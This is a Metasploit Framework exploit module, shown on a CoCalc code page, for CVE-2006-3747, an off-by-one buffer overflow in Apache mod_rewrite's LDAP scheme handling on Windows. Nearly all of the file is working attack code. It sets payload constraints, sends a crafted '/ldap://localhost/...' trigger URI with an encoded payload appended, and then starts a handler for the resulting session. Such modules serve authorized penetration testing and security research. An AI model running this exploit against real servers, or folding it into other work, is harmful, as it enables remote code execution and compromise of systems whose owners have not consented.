Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Apache Module mod_rewrite LDAP Protocol Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits the mod_rewrite LDAP protocol scheme handling

18
          flaw discovered by Mark Dowd, which produces an off-by-one overflow.

19
          Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.

20
          This module requires REWRITEPATH to be set accurately. In addition,

21
          the target must have 'RewriteEngine on' configured, with a specific

22
          'RewriteRule' condition enabled to allow for exploitation.

23


24
          The flaw affects multiple platforms, however this module currently

25
          only supports Windows based installations.

26
        },

27
        'Author' => 'aushack',

28
        'References' => [

29
          [ 'CVE', '2006-3747' ],

30
          [ 'OSVDB', '27588' ],

31
          [ 'BID', '19204' ],

32
          [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ],

33
          [ 'EDB', '3680' ],

34
          [ 'EDB', '3996' ],

35
          [ 'EDB', '2237' ]

36
        ],

37
        'DefaultOptions' => {

38
          'EXITFUNC' => 'thread',

39
          'AllowWin32SEH' => true

40
        },

41
        'Privileged' => true,

42
        'Platform' => ['win'],

43
        'Payload' => {

44
          'Space' => 636,

45
          'BadChars' => "\x00\x0a\x0d\x20",

46
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,

47
          'StackAdjustment' => -3500,

48
          'DisableNops' => true,

49
        },

50
        'Targets' => [

51
          [ 'Automatic', {} ], # aushack tested OK 20090310 win32

52
        ],

53
        'DisclosureDate' => '2006-07-28',

54
        'DefaultTarget' => 0,

55
        'Notes' => {

56
          'Reliability' => UNKNOWN_RELIABILITY,

57
          'Stability' => UNKNOWN_STABILITY,

58
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

59
        }

60
      )

61
    )

62


63
    register_options(

64
      [

65
        OptString.new('REWRITEPATH', [true, "The mod_rewrite URI path", "rewrite_path"]),

66
      ]

67
    )

68
  end

69


70
  def check

71
    res = send_request_raw({

72
      'uri' => '/',

73
      'version' => '1.1',

74
    }, 2)

75


76
    if (res.to_s =~ /Apache/) # This could be smarter.

77
      return Exploit::CheckCode::Detected

78
    end

79


80
    return Exploit::CheckCode::Safe

81
  end

82


83
  def exploit

84
    # On Linux Apache, it is possible to overwrite EIP by

85
    # sending ldap://<buf> ... TODO aushack

86


87
    trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90'

88


89
    print_status("Sending payload.")

90
    send_request_raw({

91
      'uri' => normalize_uri(datastore['REWRITEPATH']) + trigger + payload.encoded,

92
      'version' => '1.0',

93
    }, 2)

94
    handler

95
  end

96
end

97


98